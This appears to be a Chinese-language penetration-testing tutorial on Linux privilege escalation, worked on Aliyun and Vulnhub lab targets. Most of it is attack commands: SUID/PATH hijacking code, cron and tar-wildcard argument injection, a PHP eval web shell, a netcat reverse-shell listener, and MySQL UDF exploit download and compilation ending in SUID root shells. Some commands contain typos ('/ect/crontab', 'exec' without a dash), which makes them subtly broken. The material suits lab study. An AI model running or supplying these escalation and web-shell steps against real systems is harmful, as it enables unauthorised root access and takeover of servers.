image.png

演示案例:

Linux 提权本地环境变量安全-Aliyun
Linux 提权本地定时任务安全-Aliyun
Linux 提权第三方服务数据库-Vulnhub
Linux 提权提升漏洞查找关注点-拓展总结

案例 1:Linux 提权本地环境变量安全-Aliyun

配合 SUID 进行环境变量提权-本地用户环境
手写调用文件-编译-复制文件-增加环境变量-执行触发

  1. #include<unistd.h>
  2. void main(){
  3. setuid(0);
  4. getuid(0);
  5. system("ps");
  6. }
  1. gcc demo.c -o shell
  2. cp /bin/sh /tmp/ps
  3. export PATH=/tmp:$PATH
  4. ./shell
  5. id

案例 2-Linux 提权本地定时任务安全-Aliyun

第一种:路径问题

利用计划任务指向的文件的相对路径解析问题

  1. cat /ect/crontab
  2. echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/xiaodi/test.sh
  3. chmod +x /home/xiaodi/test.sh
  4. /tmp/bash

第二种:命令问题

利用通配符配合命令参数自定义命令实现提权
通配符把文件名组合进命令中,有可能把特殊的文件名当成参数执行
不安全定时任务备份命令:

  1. cd /home/undead/script;tar czf /tmp/backup.tar.gz *
  2. echo "" > "--checkpoint-action=exec=sh test.sh"
  3. echo "" > --checkpoint=1
  4. echo 'cp /bin/find /tmp/find; chmod +s /tmp/find' > /home/undead/script/test.sh

参考命令:https://www.cnblogs.com/manong--/p/8012324.html

第三种:权限问题

利用不安全的权限分配操作导致的定时文件覆盖
chmod 777 775 等 所有者 组 其他成员说明

案例 3:Linux 提权数据库 MYSQL_UDF-Vulnhub

Vulnhub 某靶机-探针 IP 及端口-利用漏洞获取 web 权限-信息收集-查看数据库配置文件-利用 Mysql 提权 Linux(Mysql 版本区别同 Windows)
#探针 IP 及端口

  1. nmap 192.168.76.0/24

利用 phpmailer 漏洞进行修改并反弹

  1. python D:/Myproject/40974.py
  2. nc -lvvp 4444

写入后门利用菜刀连接方便操作

  1. echo '<?php eval($_POST[x]);?>' >1.php

上传信息收集脚本进行提权信息收集

  1. ./LinEnum.sh

翻阅数据库配置文件获取 root 密码
#利用 Mysql 提权 searchsploit
下载 mysql udf poc 进行编译

  1. wget https://www.exploit-db.com/download/1518
  2. mv 1518 raptor_udf.c
  3. gcc -g -c raptor_udf.c
  4. gcc -g -shared -o raptor_udf.so raptor_udf.o -lc
  5. mv raptor_udf.so 1518.so

下载 1518 到目标服务器

  1. wget https://xx.xx.xx.xx/1518.so

进入数据库进行 UDF 导出

  1. use mysql;
  2. create table foo(line blob);
  3. insert into foo values(load_file('/tmp/1518.so'));
  4. select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';

创建 do_system 函数调用

  1. create function do_system returns integer soname '1518.so'
  2. select do_system('chmod u+s /usr/bin/find');

配合使用 find 调用执行

  1. touch xiaodi
  2. find xiaodi exec "whoami" \;
  3. find xiaodi exec "/bin/sh" \;
  4. id

案例 4-Linux 提权提升简单总结归类-参考 PDF

1.提权环境,信息收集(SUID,定时任务,可能漏洞,第三方服务应用等)
2.最新相关漏洞要明确(关注点),二次开发相关脚本学会展望(四个脚本)
3.本地 searchsploit 脚本及远程 exploitdb 站点搜索说明(简要使用)
4.其他提权方法如:密码复用,guid,sudo 等说明(运气,同理,鸡肋等)
SUDO 说明参考:https://www.freebuf.com/vuls/217089.html

涉及资源:

https://www.exploit-db.com/
https://www.vulnhub.com/entry/raven-2,269/
https://github.com/offensive-security/exploitdb